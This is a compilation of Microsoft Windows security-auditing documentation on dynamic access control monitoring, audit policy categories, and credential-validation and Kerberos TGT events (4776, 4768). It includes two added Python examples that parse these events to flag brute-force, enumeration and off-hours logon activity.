Using advanced security auditing options to monitor dynamic access control objects
Monitor the central access policies associated with files and folders
4/5/2019 • 3 minutes to read

Applies to
Windows 10
This topic for the IT professional describes how to monitor changes to the central access policies that are
associated with files and folders when you are using advanced security auditing options to monitor dynamic access
control objects.
This security audit policy and the event that it records are generated when the central access policy that is
associated with a file or folder is changed. This security audit policy is useful when an administrator wants to
monitor potential changes on some, but not all, files and folders on a file server.
For info about monitoring potential central access policy changes for an entire file server, see Monitor the central
access policies that apply on a file server.
Use the following procedures to configure settings to monitor central access policies that are associated with files.
These procedures assume that you have configured and deployed Dynamic Access Control in your network. For
more information about how to configure and deploy Dynamic Access Control, see Dynamic Access Control:
Scenario Overview.

Note: Your server might function differently based on the version and edition of the operating system that is
installed, your account permissions, and your menu settings.

To configure settings to monitor central access policies associated with files or folders
1. Sign in to your domain controller by using domain administrator credentials.
2. In Server Manager, point to Tools, and then click Group Policy Management.
3. In the console tree, right-click the flexible access Group Policy Object, and then click Edit.
4. Double-click Computer Configuration, double-click Security Settings, double-click Advanced Audit Policy
Configuration, double-click Policy Change, and then double-click Audit Authorization Policy Change.
5. Select the Configure the following audit events check box, select the Success check box (and the Failure
check box, if desired), and then click OK.
6. Enable auditing for a file or folder as described in the following procedure.
To enable auditing for a file or folder
1. Sign in as a member of the local administrators group on the computer that contains the files or folders that
you want to audit.
2. Right-click the file or folder, click Properties, and then click the Security tab.
3. Click Advanced, click the Auditing tab, and then click Continue.
If the User Account Control dialog box appears, confirm that the action it displays is what you want, and
then click Yes.
4. Click Add, click Select a principal, type a user name or group name in the format contoso\user1, and
then click OK.
5. In the Auditing Entry for dialog box, select the permissions that you want to audit, such as Full Control or
Delete.
6. Click OK four times to complete the configuration of the object SACL.
7. Open a File Explorer window and select or create a file or folder to audit.
8. Open an elevated command prompt, and run the following command:
gpupdate /force

After you configure settings to monitor changes to the central access policies that are associated with files and
folders, verify that the changes are being monitored.
To verify that changes to central access policies associated with files and folders are monitored
1. Sign in as a member of the local administrators group on the computer that contains the files or folders that
you want to audit.
2. Open a File Explorer window and select the file or folder that you configured for auditing in the previous
procedure.
3. Right-click the file or folder, click Properties, click the Security tab, and then click Advanced.
4. Click the Central Policy tab, click Change, and select a different central access policy (if one is available) or
select No Central Access Policy, and then click OK twice.

Note: You must select a setting that is different than your original setting to generate the audit event.

5. In Server Manager, click Tools, and then click Event Viewer.


6. Expand Windows Logs, and then click Security.
7. Look for event 4913, which is generated when the central access policy that is associated with a file or folder is
changed. This event includes the security identifiers (SIDs) of the old and new central access policies.
Related resource
Using advanced security auditing options to monitor dynamic access control objects
Monitor claim types
4/5/2019 • 2 minutes to read

Applies to
Windows 10
This topic for the IT professional describes how to monitor changes to claim types that are associated with dynamic
access control when you are using advanced security auditing options.
Claim types are one of the basic building blocks of Dynamic Access Control. Claim types can include attributes
such as the departments in an organization or the levels of security clearance that apply to classes of users. You can
use security auditing to track whether claims are added, modified, enabled, disabled, or deleted.
Use the following procedures to configure settings to monitor changes to claim types in AD DS. These procedures
assume that you have configured and deployed Dynamic Access Control, including central access policies, claims,
and other components, in your network. If you have not yet deployed Dynamic Access Control in your network,
see Deploy a Central Access Policy (Demonstration Steps).

Note: Your server might function differently based on the version and edition of the operating system that is
installed, your account permissions, and your menu settings.

To configure settings to monitor changes to claim types


1. Sign in to your domain controller by using domain administrator credentials.
2. In Server Manager, point to Tools, and then click Group Policy Management.
3. In the console tree, right-click the default domain controller Group Policy Object, and then click Edit.
4. Double-click Computer Configuration, click Security Settings, expand Advanced Audit Policy
Configuration, expand System Audit Policies, click DS Access, and then double-click Audit directory
service changes.
5. Select the Configure the following audit events check box, select the Success check box (and the Failure
check box, if desired), and then click OK.
After you configure settings to monitor changes to claim types in AD DS, verify that the changes are being
monitored.
To verify that changes to claim types are monitored
1. Sign in to your domain controller by using domain administrator credentials.
2. Open the Active Directory Administrative Center.
3. Under Dynamic Access Control, right-click Claim Types, and then click Properties.
4. Click the Security tab, click Advanced to open the Advanced Security Settings dialog box, and then click the
Auditing tab.
5. Click Add, add a security auditing setting for the container, and then close all the Security properties dialog
boxes.
6. In the Claim Types container, add a new claim type or select an existing claim type. In the Tasks pane, click
Properties, and then change one or more attributes.
Click OK, and then close the Active Directory Administrative Center.
7. Open Event Viewer on this domain controller, expand Windows Logs, and select the Security log.
Look for event 5137. Key information to look for includes the name of the new attribute that was added, the
type of claim that was created, and the user who created the claim.
Related resource
Using advanced security auditing options to monitor dynamic access control objects
Advanced security audit policy settings
4/5/2019 • 5 minutes to read

Applies to
Windows 10
This reference for IT professionals provides information about the advanced audit policy settings that are
available in Windows and the audit events that they generate.
The security audit policy settings under Security Settings\Advanced Audit Policy Configuration can help
your organization audit compliance with important business-related and security-related rules by tracking
precisely defined activities, such as:
A group administrator has modified settings or data on servers that contain finance information.
An employee within a defined group has accessed an important file.
The correct system access control list (SACL) is applied to every file and folder or registry key on a computer
or file share as a verifiable safeguard against undetected access.
You can access these audit policy settings through the Local Security Policy snap-in (secpol.msc) on the local
computer or by using Group Policy.
These advanced audit policy settings allow you to select only the behaviors that you want to monitor. You can
exclude audit results for behaviors that are of little or no concern to you, or behaviors that create an excessive
number of log entries. In addition, because security audit policies can be applied by using domain Group Policy
Objects, audit policy settings can be modified, tested, and deployed to selected users and groups with relative
simplicity. Audit policy settings under Security Settings\Advanced Audit Policy Configuration are available
in the following categories:

Account Logon
Configuring policy settings in this category can help you document attempts to authenticate account data on a
domain controller or on a local Security Accounts Manager (SAM). Unlike Logon and Logoff policy settings and
events, which track attempts to access a particular computer, settings and events in this category focus on the
account database that is used. This category includes the following subcategories:
Audit Credential Validation
Audit Kerberos Authentication Service
Audit Kerberos Service Ticket Operations
Audit Other Logon/Logoff Events

Account Management
The security audit policy settings in this category can be used to monitor changes to user and computer accounts
and groups. This category includes the following subcategories:
Audit Application Group Management
Audit Computer Account Management
Audit Distribution Group Management
Audit Other Account Management Events
Audit Security Group Management
Audit User Account Management

Detailed Tracking
Detailed Tracking security policy settings and audit events can be used to monitor the activities of individual
applications and users on that computer, and to understand how a computer is being used. This category includes
the following subcategories:
Audit DPAPI Activity
Audit PNP activity
Audit Process Creation
Audit Process Termination
Audit RPC Events

DS Access
DS Access security audit policy settings provide a detailed audit trail of attempts to access and modify objects in
Active Directory Domain Services (AD DS). These audit events are logged only on domain controllers. This
category includes the following subcategories:
Audit Detailed Directory Service Replication
Audit Directory Service Access
Audit Directory Service Changes
Audit Directory Service Replication

Logon/Logoff
Logon/Logoff security policy settings and audit events allow you to track attempts to log on to a computer
interactively or over a network. These events are particularly useful for tracking user activity and identifying
potential attacks on network resources. This category includes the following subcategories:
Audit Account Lockout
Audit User/Device Claims
Audit IPsec Extended Mode
Audit Group Membership
Audit IPsec Main Mode
Audit IPsec Quick Mode
Audit Logoff
Audit Logon
Audit Network Policy Server
Audit Other Logon/Logoff Events
Audit Special Logon

Object Access
Object Access policy settings and audit events allow you to track attempts to access specific objects or types of
objects on a network or computer. To audit attempts to access a file, directory, registry key, or any other object,
you must enable the appropriate Object Access auditing subcategory for success and/or failure events. For
example, the file system subcategory needs to be enabled to audit file operations, and the Registry subcategory
needs to be enabled to audit registry accesses.
Proving that these audit policies are in effect to an external auditor is more difficult. There is no easy way to verify
that the proper SACLs are set on all inherited objects. To address this issue, see Global Object Access Auditing.
This category includes the following subcategories:
Audit Application Generated
Audit Certification Services
Audit Detailed File Share
Audit File Share
Audit File System
Audit Filtering Platform Connection
Audit Filtering Platform Packet Drop
Audit Handle Manipulation
Audit Kernel Object
Audit Other Object Access Events
Audit Registry
Audit Removable Storage
Audit SAM
Audit Central Access Policy Staging

Policy Change
Policy Change audit events allow you to track changes to important security policies on a local system or
network. Because policies are typically established by administrators to help secure network resources,
monitoring changes or attempts to change these policies can be an important aspect of security management for
a network. This category includes the following subcategories:
Audit Audit Policy Change
Audit Authentication Policy Change
Audit Authorization Policy Change
Audit Filtering Platform Policy Change
Audit MPSSVC Rule-Level Policy Change
Audit Other Policy Change Events

Privilege Use
Permissions on a network are granted for users or computers to complete defined tasks. Privilege Use security
policy settings and audit events allow you to track the use of certain permissions on one or more systems. This
category includes the following subcategories:
Audit Non-Sensitive Privilege Use
Audit Sensitive Privilege Use
Audit Other Privilege Use Events

System
System security policy settings and audit events allow you to track system-level changes to a computer that are
not included in other categories and that have potential security implications. This category includes the following
subcategories:
Audit IPsec Driver
Audit Other System Events
Audit Security State Change
Audit Security System Extension
Audit System Integrity

Global Object Access Auditing


Global Object Access Auditing policy settings allow administrators to define computer system access control lists
(SACLs) per object type for the file system or for the registry. The specified SACL is then automatically applied to
every object of that type. Auditors will be able to prove that every resource in the system is protected by an audit
policy by viewing the contents of the Global Object Access Auditing policy settings. For example, if auditors see a
policy setting called "Track all changes made by group administrators," they know that this policy is in effect.
Resource SACLs are also useful for diagnostic scenarios. For example, setting the Global Object Access Auditing
policy to log all the activity for a specific user and enabling the policy to track "Access denied" events for the file
system or registry can help administrators quickly identify which object in a system is denying a user access.

Note: If a file or folder SACL and a Global Object Access Auditing policy setting (or a single registry setting
SACL and a Global Object Access Auditing policy setting) are configured on a computer, the effective SACL is
derived from combining the file or folder SACL and the Global Object Access Auditing policy. This means that
an audit event is generated if an activity matches the file or folder SACL or the Global Object Access Auditing
policy.

This category includes the following subcategories:


File System (Global Object Access Auditing)
Registry (Global Object Access Auditing)
Audit Credential Validation
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Credential Validation determines whether the operating system generates audit events on credentials that
are submitted for a user account logon request.
These events occur on the computer that is authoritative for the credentials as follows:
For domain accounts, the domain controller is authoritative.
For local accounts, the local computer is authoritative.
Event volume:
High on domain controllers.
Low on member servers and workstations.
Because domain accounts are used much more frequently than local accounts in enterprise environments, most of
the Account Logon events in a domain environment occur on the domain controllers that are authoritative for the
domain accounts. However, these events can occur on any computer, and they may occur in conjunction with or on
separate computers from Logon and Logoff events.
The main reason to enable this auditing subcategory is to handle local accounts authentication attempts and, for
domain accounts, NTLM authentication in the domain. It is especially useful for monitoring unsuccessful attempts,
to find brute-force attacks, account enumeration, and potential account compromise events on domain controllers.

COMPUTER TYPE       GENERAL SUCCESS   GENERAL FAILURE   STRONGER SUCCESS   STRONGER FAILURE
Domain Controller   IF                Yes               Yes                Yes
Member Server       Yes               Yes               Yes                Yes
Workstation         Yes               Yes               Yes                Yes

Comments:
Domain Controller: Expected volume of events is high for domain controllers, because this subcategory will
generate events when an authentication attempt is made using any domain account and NTLM authentication.
IF – We recommend Success auditing to keep track of domain-account authentication events using the NTLM
protocol. Expect a high volume of events. For recommendations for using and analyzing the collected
information, see the Security Monitoring Recommendations sections. Just collecting Success auditing events in
this subcategory for future use in case of a security incident is not very useful, because events in this
subcategory are not always informative.
We recommend Failure auditing, to collect information about failed authentication attempts using domain
accounts and the NTLM authentication protocol.
Member Server: Expected volume of events is low for member servers, because this subcategory will generate
events when an authentication attempt is made using a local account, which should not happen too often.
We recommend Success auditing, to keep track of authentication events by local accounts.
We recommend Failure auditing, to collect information about failed authentication attempts by local accounts.
Workstation: Expected volume of events is low for workstations, because this subcategory will generate events
when an authentication attempt is made using a local account, which should not happen too often.
We recommend Success auditing, to keep track of authentication events by local accounts.
We recommend Failure auditing, to collect information about failed authentication attempts by local accounts.

Events List:
4774(S, F): An account was mapped for logon.
4775(F): An account could not be mapped for logon.
4776(S, F): The computer attempted to validate the credentials for an account.
4777(F): The domain controller failed to validate the credentials for an account.
4774(S, F): An account was mapped for logon.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Success events do not appear to occur. Failure event has been reported.
Subcategory: Audit Credential Validation
Event Schema:
An account was mapped for logon.
Authentication Package:Schannel
Account UPN:<Account>@<Domain>
Mapped Name:<Account>
Required Server Roles: no information.
Minimum OS Version: no information.
Event Versions: 0.

Security Monitoring Recommendations


There is no recommendation for this event in this document.
4775(F): An account could not be mapped for logon.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
It appears that this event never occurs.
Subcategory: Audit Credential Validation
Event Schema:
An account could not be mapped for logon.
Authentication Package:%1
Account Name:%2
Required Server Roles: no information.
Minimum OS Version: no information.
Event Versions: 0.

Security Monitoring Recommendations


There is no recommendation for this event in this document.
4776(S, F): The computer attempted to validate the
credentials for an account.
4/5/2019 • 5 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Credential Validation
Event Description:
This event generates every time that a credential validation occurs using NTLM authentication.
This event occurs only on the computer that is authoritative for the provided credentials. For domain accounts,
the domain controller is authoritative. For local accounts, the local computer is authoritative.
It shows successful and unsuccessful credential validation attempts.
It shows only the computer name (Source Workstation) from which the authentication attempt was performed
(authentication source). For example, if you authenticate from CLIENT-1 to SERVER-1 using a domain account
you will see CLIENT-1 in the Source Workstation field. Information about the destination computer (SERVER-1)
is not presented in this event.
If a credential validation attempt fails, you will see a Failure event with Error Code parameter value not equal to
“0x0”.
The main advantage of this event is that on domain controllers you can see all authentication attempts for domain
accounts when NTLM authentication was used.
For monitoring local account logon attempts, it is better to use event “4624: An account was successfully logged
on” because it contains more details and is more informative.
This event also generates when a workstation unlock event occurs.
This event does not generate when a domain account logs on locally to a domain controller.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4776</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14336</Task>
<Opcode>0</Opcode>
<Keywords>0x8010000000000000</Keywords>
<TimeCreated SystemTime="2015-07-25T04:38:11.003163100Z" />
<EventRecordID>165437</EventRecordID>
<Correlation />
<Execution ProcessID="500" ThreadID="532" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="PackageName">MICROSOFT_AUTHENTICATION_PACKAGE_V1_0</Data>
<Data Name="TargetUserName">dadmin</Data>
<Data Name="Workstation">WIN81</Data>
<Data Name="Status">0xc0000234</Data>
</EventData>
</Event>

Required Server Roles: no specific requirements.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Authentication Package [Type = UnicodeString]: the name of Authentication Package which was used for
credential validation. It is always “MICROSOFT_AUTHENTICATION_PACKAGE_V1_0” for 4776 event.

Note Authentication package is a DLL that encapsulates the authentication logic used to determine
whether to permit a user to log on. Local Security Authority (LSA) authenticates a user logon by sending the
request to an authentication package. The authentication package then examines the logon information and
either authenticates or rejects the user logon attempt.

Logon Account [Type = UnicodeString]: the name of the account that had its credentials validated by the
Authentication Package. Can be user name, computer account name or well-known security principal
account name. Examples:
User example: dadmin
Computer account example: WIN81$
Local System account example: Local
Local Service account example: Local Service
Source Workstation [Type = UnicodeString]: the name of the computer from which the logon attempt
originated.
Error Code [Type = HexInt32]: contains error code for Failure events. For Success events this parameter
has “0x0” value. The table below contains most common error codes for this event:
ERROR CODE   DESCRIPTION
0xC0000064   The username you typed does not exist. Bad username.
0xC000006A   Account logon with misspelled or bad password.
0xC000006D   Generic logon failure. Some of the potential causes for this:
             An invalid username and/or password was used
             LAN Manager Authentication Level mismatch between the source and target computers.
0xC000006F   Account logon outside authorized hours.
0xC0000070   Account logon from unauthorized workstation.
0xC0000071   Account logon with expired password.
0xC0000072   Account logon to account disabled by administrator.
0xC0000193   Account logon with expired account.
0xC0000224   Account logon with "Change Password at Next Logon" flagged.
0xC0000234   Account logon with account locked.
0xc0000371   The local account store does not contain secret material for the specified account.
0x0          No errors.

Table 1. Winlogon Error Codes.

Security Monitoring Recommendations


For 4776(S, F): The computer attempted to validate the credentials for an account.

TYPE OF MONITORING REQUIRED / RECOMMENDATION

High-value accounts: You might have high-value domain or local accounts for which you need to monitor each
action. Examples of high-value accounts are database administrators, built-in local administrator account,
domain administrators, service accounts, domain controller accounts and so on.
Recommendation: Monitor this event with the “Logon Account” that corresponds to the high-value account or
accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring
potential malicious actions. For example, you might need to monitor for use of an account outside of working
hours.
Recommendation: When you monitor for anomalies or malicious actions, use the “Logon Account” value (with
other information) to monitor how or when a particular account is being used. To monitor activity of specific
user accounts outside of working hours, monitor the appropriate Logon Account + Source Workstation pairs.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should
never be used.
Recommendation: Monitor this event with the “Logon Account” that should never be used.

Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform
actions corresponding to particular events.
Recommendation: If this event corresponds to a “whitelist-only” action, review the “Logon Account” for
accounts that are outside the whitelist.

Restricted-use computers: You might have certain computers from which certain people (accounts) should not
log on.
Recommendation: Monitor the target Source Workstation for credential validation requests from the “Logon
Account” that you are concerned about.

Account naming conventions: Your organization might have specific naming conventions for account names.
Recommendation: Monitor “Logon Account” for names that don’t comply with naming conventions.

If NTLM authentication should not be used for a specific account, monitor for that account. Don’t forget that
local logon will always use NTLM authentication if an account logs on to a device where its user account is
stored.
You can use this event to collect all NTLM authentication attempts in the domain, if needed. Don’t forget
that local logon will always use NTLM authentication if the account logs on to a device where its user
account is stored.
If a local account should be used only locally (for example, network logon or terminal services logon is not
allowed), you need to monitor for all events where Source Workstation and Computer (where the event
was generated and where the credentials are stored) have different values.
Consider tracking the following errors for the reasons listed:

ERROR TO TRACK / WHAT THE ERROR MIGHT INDICATE

User logon with misspelled or bad user account: For example, N events in the last N minutes can be an
indicator of an account enumeration attack, especially relevant for highly critical accounts.
User logon with misspelled or bad password: For example, N events in the last N minutes can be an indicator
of a brute-force password attack, especially relevant for highly critical accounts.
User logon outside authorized hours: Can indicate a compromised account; especially relevant for highly
critical accounts.
User logon from unauthorized workstation: Can indicate a compromised account; especially relevant for highly
critical accounts.
User logon to account disabled by administrator: For example, N events in last N minutes can be an indicator
of an account compromise attempt, especially relevant for highly critical accounts.
User logon with expired account: Can indicate an account compromise attempt; especially relevant for highly
critical accounts.
User logon with account locked: Can indicate a brute-force password attack; especially relevant for highly
critical accounts.
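The following is an added example, not code from Microsoft's documentation: it parses 4776 records in the Event XML shape shown above and applies the monitoring recommendations from the two tables (never-used accounts, local-only accounts validated from another Source Workstation, successes outside working hours, and "N events in the last N minutes" counts for bad passwords, bad usernames and disabled-account attempts, using the codes from Table 1). The function names, the thresholds and working hours, and the sample records (FS01, svc_backup, Guest) are assumptions; the sample XML is constructed to match the page's example record.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime, timedelta

# Added example, not Microsoft's code. Function names, thresholds, working hours
# and the sample events are assumptions made for illustration.
EVENT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Error codes from Table 1 (Winlogon Error Codes) on this page.
ERROR_CODES = {
    0x0: "success",
    0xC0000064: "bad username",
    0xC000006A: "bad password",
    0xC000006D: "generic logon failure",
    0xC000006F: "logon outside authorized hours",
    0xC0000070: "logon from unauthorized workstation",
    0xC0000071: "expired password",
    0xC0000072: "account disabled",
    0xC0000193: "expired account",
    0xC0000224: "change password at next logon",
    0xC0000234: "account locked",
    0xC0000371: "no secret material for account",
}


def parse_4776(xml_text):
    """Extract the fields a monitoring rule needs from one 4776 Event XML record."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", EVENT_NS)
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", EVENT_NS)}
    stamp = system.find("e:TimeCreated", EVENT_NS).get("SystemTime")
    return {
        "event_id": int(system.find("e:EventID", EVENT_NS).text),
        "time": datetime.strptime(stamp[:19], "%Y-%m-%dT%H:%M:%S"),
        "computer": system.find("e:Computer", EVENT_NS).text,  # machine holding the credentials
        "logon_account": data["TargetUserName"],
        "source_workstation": data["Workstation"],
        "status": int(data["Status"], 16),
    }


def analyze_4776(events, never_used=(), local_only=(), work_hours=(8, 18),
                 window=timedelta(minutes=10), threshold=5):
    """Apply the 4776 monitoring recommendations to parsed events.

    Returns a sorted list of (rule, subject) findings; each rule fires once per subject.
    """
    never_used = {a.lower() for a in never_used}
    local_only = {a.lower() for a in local_only}
    recent = defaultdict(list)      # (rule, subject) -> timestamps still inside the window
    findings = set()
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["event_id"] != 4776:
            continue
        acct = ev["logon_account"].lower()
        src = ev["source_workstation"].upper()
        host = ev["computer"].split(".")[0].upper()
        if acct in never_used:
            findings.add(("never-used-account", acct))
        # Local-only account validated from elsewhere: Source Workstation differs from Computer.
        if acct in local_only and src != host:
            findings.add(("local-account-used-remotely", f"{acct}@{src}"))
        if ev["status"] == 0 and not (work_hours[0] <= ev["time"].hour < work_hours[1]):
            findings.add(("success-outside-working-hours", f"{acct}@{src}"))
        # "N events in the last N minutes": bad passwords per account (brute force),
        # bad usernames per source workstation (enumeration), disabled-account attempts per account.
        rule = {0xC000006A: ("brute-force-password", acct),
                0xC0000064: ("account-enumeration", src),
                0xC0000072: ("disabled-account-attempts", acct)}.get(ev["status"])
        if rule:
            recent[rule] = [t for t in recent[rule] + [ev["time"]] if ev["time"] - t <= window]
            if len(recent[rule]) >= threshold:
                findings.add(rule)
    return sorted(findings)


def make_event(when, computer, account, workstation, status):
    """Build a constructed 4776 record shaped like the Event XML sample on this page."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{{54849625-5478-4994-A5BA-3E3B0328C30D}}" />
    <EventID>4776</EventID><Version>0</Version><Level>0</Level><Task>14336</Task><Opcode>0</Opcode>
    <Keywords>0x8010000000000000</Keywords><TimeCreated SystemTime="{when.strftime('%Y-%m-%dT%H:%M:%S')}.000000000Z" />
    <EventRecordID>0</EventRecordID><Correlation /><Execution ProcessID="500" ThreadID="532" />
    <Channel>Security</Channel><Computer>{computer}</Computer><Security />
  </System>
  <EventData>
    <Data Name="PackageName">MICROSOFT_AUTHENTICATION_PACKAGE_V1_0</Data>
    <Data Name="TargetUserName">{account}</Data>
    <Data Name="Workstation">{workstation}</Data>
    <Data Name="Status">0x{status:08x}</Data>
  </EventData>
</Event>"""


def sample_events():
    """Constructed sample (not real telemetry): a bad-password burst, an off-hours success,
    a local-only account validated remotely, and an attempt against a disabled Guest account."""
    t0 = datetime(2015, 7, 25, 4, 38, 11)          # 04:38, outside the assumed 08-18 hours
    xml = [make_event(t0 + timedelta(seconds=30 * i), "DC01.contoso.local", "dadmin", "WIN81", 0xC000006A)
           for i in range(5)]
    xml.append(make_event(t0 + timedelta(minutes=5), "DC01.contoso.local", "dadmin", "WIN81", 0x0))
    xml.append(make_event(t0 + timedelta(minutes=6), "FS01.contoso.local", "svc_backup", "WIN81", 0x0))
    xml.append(make_event(t0 + timedelta(minutes=7), "DC01.contoso.local", "Guest", "WIN81", 0xC0000072))
    return [parse_4776(x) for x in xml]
```

Running `analyze_4776(sample_events(), never_used=("Guest",), local_only=("svc_backup",))` reports the brute-force burst against dadmin, the svc_backup validation from WIN81 rather than FS01, the Guest attempt, and the two off-hours successes; the single disabled-account attempt stays below the threshold. Counting bad usernames per source rather than per account is deliberate: enumeration shows up as many different names from one workstation, which a per-account count would never reach.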
4777(F): The domain controller failed to validate the
credentials for an account.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Currently this event doesn’t generate. It is a defined event, but it is never invoked by the operating system. 4776
failure event is generated instead.
Subcategory: Audit Credential Validation
Audit Kerberos Authentication Service
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Kerberos Authentication Service determines whether to generate audit events for Kerberos authentication
ticket-granting ticket (TGT) requests.
If you configure this policy setting, an audit event is generated after a Kerberos authentication TGT request.
Success audits record successful attempts and Failure audits record unsuccessful attempts.
Event volume: High on Kerberos Key Distribution Center servers.
This subcategory contains events about issued TGTs and failed TGT requests. It also contains events about failed
Pre-Authentications, due to wrong user password or when the user’s password has expired.

COMPUTER TYPE       GENERAL SUCCESS   GENERAL FAILURE   STRONGER SUCCESS   STRONGER FAILURE
Domain Controller   Yes               Yes               Yes                Yes
Member Server       No                No                No                 No
Workstation         No                No                No                 No

Comments:
Domain Controller: We recommend Success auditing, because you will see all Kerberos Authentication requests
(TGT requests), which are a part of domain account logons. Also, you can see the IP address from which this
account requested a TGT, when TGT was requested, which encryption type was used and so on.
We recommend Failure auditing, because you will see all failed requests with wrong password, username, revoked
certificate, and so on. You will also be able to detect Kerberos issues or possible attack attempts.
Expected volume is high on domain controllers.
Member Server: This subcategory makes sense only on domain controllers.
Workstation: This subcategory makes sense only on domain controllers.

Events List:
4768(S, F): A Kerberos authentication ticket (TGT) was requested.
4771(F): Kerberos pre-authentication failed.
4772(F): A Kerberos authentication ticket request failed.
4768(S, F): A Kerberos authentication ticket (TGT)
was requested.
4/5/2019 • 26 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Kerberos Authentication Service
Event Description:
This event generates every time Key Distribution Center issues a Kerberos Ticket Granting Ticket (TGT).
This event generates only on domain controllers.
If TGT issue fails then you will see Failure event with Result Code field not equal to “0x0”.
This event doesn't generate for Result Codes: 0x10, 0x17 and 0x18. Event “4771: Kerberos pre-authentication
failed.” generates instead.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4768</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14339</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-07T18:13:46.074535600Z" />
<EventRecordID>166747</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1496" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="TargetUserName">dadmin</Data>
<Data Name="TargetDomainName">CONTOSO.LOCAL</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="ServiceName">krbtgt</Data>
<Data Name="ServiceSid">S-1-5-21-3457937927-2839227994-823803824-502</Data>
<Data Name="TicketOptions">0x40810010</Data>
<Data Name="Status">0x0</Data>
<Data Name="TicketEncryptionType">0x12</Data>
<Data Name="PreAuthType">15</Data>
<Data Name="IpAddress">::ffff:10.0.0.12</Data>
<Data Name="IpPort">49273</Data>
<Data Name="CertIssuerName">contoso-DC01-CA-1</Data>
<Data Name="CertSerialNumber">1D0000000D292FBE3C6CDDAFA200020000000D</Data>
<Data Name="CertThumbprint">564DFAEE99C71D62ABC553E695BD8DBC46669413</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
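As an added example (not Microsoft's code), the following interprets the EventData of one 4768 record using the facts this page states: a Result Code other than 0x0 marks a failure, Result Codes 0x10, 0x17 and 0x18 are recorded as 4771 instead of 4768, computer account names end in $, failure events carry krbtgt/REALM as the Service Name and NULL SIDs, the Client Address may be IPv4, IPv6, ::ffff:IPv4 or ::1, and Client Port 0 means a local request. The success sample is taken from the page's XML; the failure sample, its user name and its result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN in RFC 4120) are constructed assumptions, as are the function names.

```python
import ipaddress

# Added example, not Microsoft's code. Function names and the failure sample are assumptions.

# Result codes for which the KDC writes 4771 instead of 4768 (stated on this page).
PREAUTH_FAILURE_CODES = {0x10, 0x17, 0x18}


def event_id_for_tgt_result(result_code):
    """Which event records a TGT request that ended with this Result Code: 4768 or 4771."""
    return 4771 if result_code in PREAUTH_FAILURE_CODES else 4768


def client_address(raw):
    """Normalize the Client Address formats listed on the page to a plain address string."""
    addr = ipaddress.ip_address(raw)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        return str(addr.ipv4_mapped)          # ::ffff:10.0.0.12 -> 10.0.0.12
    return str(addr)                          # plain IPv4, plain IPv6, or ::1


def interpret_4768(data):
    """Summarize the EventData of one 4768 event given as a dict of Data Name -> value."""
    status = int(data["Status"], 16)
    account = data["TargetUserName"]
    addr = client_address(data["IpAddress"])
    summary = {
        "outcome": "success" if status == 0 else "failure",
        "result_code": status,
        "account": account,
        "account_kind": "computer" if account.endswith("$") else "user",
        "realm": data["TargetDomainName"],
        "service": data["ServiceName"],
        "client_ip": addr,
        # Port 0 or the loopback address both mean the request was issued on the DC itself.
        "local_request": int(data["IpPort"]) == 0 or ipaddress.ip_address(addr).is_loopback,
        "sid_resolved": data["TargetSid"] != "NULL SID",
    }
    if status != 0:
        # Failure events name the service as krbtgt/REALM; keep the realm part.
        summary["service_realm"] = data["ServiceName"].partition("/")[2] or None
    return summary


# Success sample: the EventData values from the 4768 Event XML on this page.
SAMPLE_SUCCESS = {
    "TargetUserName": "dadmin", "TargetDomainName": "CONTOSO.LOCAL",
    "TargetSid": "S-1-5-21-3457937927-2839227994-823803824-1104",
    "ServiceName": "krbtgt", "ServiceSid": "S-1-5-21-3457937927-2839227994-823803824-502",
    "TicketOptions": "0x40810010", "Status": "0x0", "TicketEncryptionType": "0x12",
    "PreAuthType": "15", "IpAddress": "::ffff:10.0.0.12", "IpPort": "49273",
}

# Failure sample (constructed): unknown principal requested locally on the DC.
SAMPLE_FAILURE = {
    "TargetUserName": "nosuchuser", "TargetDomainName": "CONTOSO.LOCAL",
    "TargetSid": "NULL SID", "ServiceName": "krbtgt/CONTOSO", "ServiceSid": "NULL SID",
    "TicketOptions": "0x40810010", "Status": "0x6", "TicketEncryptionType": "0xffffffff",
    "PreAuthType": "-", "IpAddress": "::1", "IpPort": "0",
}
```

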